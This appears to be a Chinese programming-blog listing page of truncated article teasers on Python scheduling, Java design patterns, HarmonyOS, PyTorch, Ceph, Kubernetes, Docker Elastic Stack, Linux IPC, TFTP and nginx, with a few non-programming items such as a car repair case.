3步调用ChatGPT打造高可靠Python调度器，零依赖实现定时任务自动化关键词：ChatGPT代码生成、Python调度器设计、定时任务自动化、异常处理机制、日志监控系统需求分析与技术选型 GitHub Sentinel 需要实现两种定时任务模式： #mermaid-svg-prOScv2NNhn6w90N {font-family:…...

编程日记 2025/8/5 14:46:02

HarmonyOS 基础语法概述 UI范式

ArkUI框架 - UI范式 ArkTS的基本组成装饰器： 用于装饰类、结构、方法以及变量，并赋予其特殊的含义。如上述示例中Entry、Component和State都是装饰器，Component表示自定义组件，Entry表示该自定义组件为入口组件，Stat…...

编程日记 2025/8/15 7:52:08

23种设计模式-创建型模式之建造者模式（Java版本）

Java 建造者模式（Builder Pattern）详解 🧱 什么是建造者模式？ 建造者模式用于将一个复杂对象的构建过程与其表示分离，使得同样的构建过程可以创建不同的表示。适用于创建过程复杂、构造顺序稳定但组件变化的对象。…...

编程日记 2025/8/12 3:43:46

【AI提示词】退休规划顾问专家

提示说明随着人口老龄化的加剧，越来越多的人开始关注退休规划问题。一个专业的退休规划顾问可以帮助用户合理规划退休生活，确保退休后的生活质量。提示词 # 角色退休规划顾问专家## 注意 1. 专家设计应符合退休规划的专业性和可靠性，帮…...

编程日记 2025/8/14 1:27:55

文献总结：NIPS2023——车路协同自动驾驶感知中的时间对齐（FFNet）

FFNet 一、文献基本信息二、背景介绍三、相关研究1. 以自车为中心的3D目标检测2. 车路协同3D目标检测3. 特征流四、FFNet网络架构1. 车路协同3D目标检测任务定义2. 特征流网络2.1 特征流生成2.2 压缩、传输与解压缩2.3 车辆传感器数据与基础设施特征流融合 3. 特征流网络训练流…...

编程日记 2025/8/13 4:19:42

（二十六）Java观察者模式在Android开发中的应用详解

Java观察者模式在Android开发中的应用观察者模式（Observer Pattern）是一种行为型设计模式，它定义了一种一对多的依赖关系，使得多个观察者对象可以同时监听一个主题对象。当主题对象的状态发生变化时，所有注册的观察者…...

编程日记 2025/8/6 16:53:58

goland做验证码识别时报“undefined: gosseract.NewClient”

gosseract 应该有和 c 相关的配置库因此需要安装 cgo 并且启用 CGO_ENABLED 在cmd下面输入这个 go env -w CGO_ENABLED1 接着输入 go env 验证是否设置成功解决了这个问题后 “undefined: gosseract.NewClient” 又出现了 # runtime/cgo …...

编程日记 2025/8/5 14:45:52

ceph weight 和 reweight 的区别

ceph osd df ID CLASS WEIGHT REWEIGHT SIZE RAW USE DATA OMAP META AVAIL %USE VAR PGS STATUS0 nvme 6.98630 0.95508 7.0 TiB 5.0 TiB 4.9 TiB 13 GiB 33 GiB 2.0 TiB 71.10 0.96 83 up1 nvme 6.98630...

编程日记 2025/8/7 11:42:29

# 使用 PyTorch 构建并训练一个简单的 CNN 模型进行图像分类

使用 PyTorch 构建并训练一个简单的 CNN 模型进行图像分类在深度学习领域，卷积神经网络（CNN）是处理图像分类任务的强大工具。本文将通过一个简单的示例，展示如何使用 PyTorch 构建、训练和测试一个 CNN 模型，用于对食…...

编程日记 2025/8/9 17:11:37

Linux网络编程深入解析TFTP协议：基于UDP的文件传输实战

知识点1【TFTP的概述】学习通信的基本：通信协议（具体发送上面样的报文）、通信流程（按照什么步骤发送） 1、TFTP的概述 tftp：简单文件传输协议，**基于UDP，**不进行用户有效性验证 …...

编程日记 2025/8/13 10:58:23

汽车免拆诊断案例 | 2019款大众途观L车鼓风机偶尔不工作

故障现象一辆2019款大众途观L车，搭载DKV发动机和0DE双离合变速器，累计行驶里程约为8万km。车主进厂反映，鼓风机偶尔不工作。故障诊断　接车后试车，鼓风机各挡位均工作正常。用故障检测仪检测，空调控制单元&#x…...

编程日记 2025/8/14 0:25:44

编程常见错误归类

上一篇讲了调试，今天通过一个举例回忆一下上一篇内容吧！ 1. 回顾：调试举例在VS2022、X86、Debug的环境下，编译器不做任何优化的话，下⾯代码执⾏的结果是啥？ #include <stdio.h> int main() {int …...

编程日记 2025/8/13 12:08:28

Python 3.13 support for PyTorch

Python 3.13 support for PyTorch Python 3.13 support for PyTorch 去官网可以查到具体信息：https://pytorch.org/get-started/locally/ 然后选择自己的CUDA版本，下面会显示下载网站，比如我选择12.4，则会出现：pip3 …...

编程日记 2025/8/16 1:34:04

中国联通：《DeepSeek洞察与大模型应用：人工智能技术发展与应用实践》（可下载）

近年来，人工智能（AI）技术迅猛发展，尤其是大模型技术的崛起，正在深刻改变各行各业的运营模式和创新路径。作为中国通信行业的领军企业之一，中国联通积极拥抱AI技术变革，结合自身在通信网络、大数…...

编程日记 2025/8/11 21:40:49

k8s 调整Node节点 Max_Pods

默认情况下，Kubernetes集群中一个Node最多能起110个Pod。这是基于性能和资源管理的考虑，以确保Kubernetes集群的稳定性和可靠性。查看kht125节点上支持的最大pod数量: kubectl describe node kht125 | grep -i “Capacity|Allocatable” -A 6 调整…...

编程日记 2025/8/12 15:24:20

VR拍摄要点与技巧有哪些？有哪些最佳实践？

VR拍摄要点与技巧：最佳实践 VR技术通过模拟环境，使用户能够沉浸在一个完全由计算机生成的虚拟世界中，进行互动体验。在VR拍摄领域，我们主要利用这一技术来创建360度全景视频或图片，让观众能够全方位、无死角地感受拍摄…...

编程日记 2025/8/14 19:57:17

使用 Docker 安装 Elastic Stack 并重置本地密码

Elastic Stack（也被称为 ELK Stack）是一个非常强大的工具套件，用于实时搜索、分析和可视化大量数据。Elastic Stack 包括 Elasticsearch、Logstash、Kibana 等组件。本文将展示如何使用 Docker 安装 Elasticsearch 并重置本地用户密码。 ###…...

编程日记 2025/8/12 22:08:51

安卓手机万能遥控器APP推荐

软件介绍安卓手机也能当“家电总控台”？这款小米旗下的万能遥控器APP，直接把遥控器做成“傻瓜式操作”——不用配对，不连蓝牙，点开就能操控电视、空调、机顶盒，甚至其他品牌的电器！雷总这波操作直接封神&…...

编程日记 2025/8/16 1:24:33

PLOS ONE：VR 游戏扫描揭示了 ADHD 儿童独特的大脑活动

在孩子的成长过程中，总有那么一些“与众不同”的孩子。他们似乎总是坐不住，课堂上小动作不断，注意力难以集中，作业总是拖拖拉拉……这些行为常常被家长和老师简单地归结为“淘气”“不听话”。然而，他们可能并不只是“…...

编程日记 2025/8/13 21:04:12

Linux 系统编程 day4 进程管道

进程间通信（IPC） Linux环境下，进程地址空间相互独立，任何一个进程的全局变量在另一个进程中都看不到，所以进程和进程之间不能互相访问，要交换数据必须通过内核，在内核中开辟一块缓冲区&#xf…...

编程日记 2025/8/12 22:53:55

基于DeepSeek的考研暑假日志分析

注：我去年考研时写了日志，大致记录了我每天的主要活动。由于过于琐碎，一直没有翻看。突发奇想，现在利用deepseek总结其中规律。从你的日志中可以总结出以下规律和活动兴衰起落： 一、学习活动规律与演变 …...

编程日记 2025/8/8 19:27:33

Python 写生成应用商店(2025版) 网页方便收集应用，局域网使用

工具【1】：nginx 配置 nginx.conf 文件 server { listen 8080; server_name example.com; location / { root E:/BIT_Soft_2025; index index.html index.htm; } # 定义错误页面 error_page 404 /4…...

编程日记 2025/8/12 8:05:12